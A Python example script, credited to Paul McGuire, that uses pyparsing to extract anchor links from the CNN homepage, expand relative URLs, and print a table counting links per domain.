# URL extractor
# Copyright 2004, Paul McGuire
from collections import Counter
import pprint
from urllib.request import urlopen

from pyparsing import makeHTMLTags, pyparsing_common as ppc, ParseException

# Define the pyparsing grammar for an HTML link, that is:
#    URLlink ::= <a href= URL>linkText</a>
#    URL ::= doubleQuotedString | alphanumericWordPath
# Note that whitespace may appear just about anywhere in the link. There is no
# need to show this explicitly in the grammar; by default, pyparsing skips over
# whitespace between tokens.
linkOpenTag, linkCloseTag = makeHTMLTags("a")
link = linkOpenTag + linkOpenTag.tag_body("body") + linkCloseTag.suppress()
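# A quick check (using a made-up sample tag) that the whitespace-skipping
# described above works: the extra spaces inside the tag are ignored.
demo = link.parseString('<a  href = "/index.html" >Home</a>')
assert demo.href == "/index.html" and demo.body == "Home"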


# Add a parse action to expand relative URLs
def expand_relative_url(t):
    url = t.href
    if url.startswith("//"):
        url = "https:" + url
    elif url.startswith(("/", "?", "#")):
        url = "https://www.cnn.com" + url

    # Put modified URL back into input tokens
    t["href"] = url


link.add_parse_action(expand_relative_url)
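# A minimal sanity check of the parse action, using a hypothetical relative
# link such as might appear on the page:
sample = link.parseString('<a href="/videos">Videos</a>')
assert sample.href == "https://www.cnn.com/videos"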

# Go get some HTML with some links in it.
with urlopen("https://www.cnn.com/") as page:
    htmlText = page.read().decode()

# scanString is a generator that loops through the input htmlText, and for each
# match yields the tokens and start and end locations (for this application, we are
# not interested in the start and end values).
for toks, _, _ in link.scanString(htmlText):
    print(toks.href, "->", toks.body)

# Create dictionary with a dict comprehension, assembled from each pair of tokens returned
# from a matched URL.
links = {toks.body: toks.href for toks, _, _ in link.scanString(htmlText)}
pprint.pprint(links)
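# links now maps each link's text to its absolute URL, e.g. (the entries
# shown here are illustrative only):
#   {'World': 'https://www.cnn.com/world', 'Video': 'https://www.cnn.com/videos', ...}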

# Parse the urls in the links using pyparsing_common.url, and tally up all
# the different domains in a Counter.
domains = Counter()
for url in links.values():
    print(url)

    # skip any hrefs that do not parse as URLs (e.g. "mailto:" or empty links)
    try:
        parsed = ppc.url.parseString(url)
    except ParseException:
        continue

    # print parsed fields for each new url
    if parsed.host not in domains:
        print(parsed.dump())
        print()

    # update domain counter
    domains[parsed.host] += 1


# Print out a little table of all the domains in the urls
max_domain_len = max((len(d) for d in domains), default=len("Domain"))
print()
print("{:{}s}  {}".format("Domain", max_domain_len, "Count"))
print("{:=<{}}  {:=<5}".format("", max_domain_len, ""))

for domain, count in domains.most_common():
    print("{:{}s}  {:5d}".format(domain, max_domain_len, count))
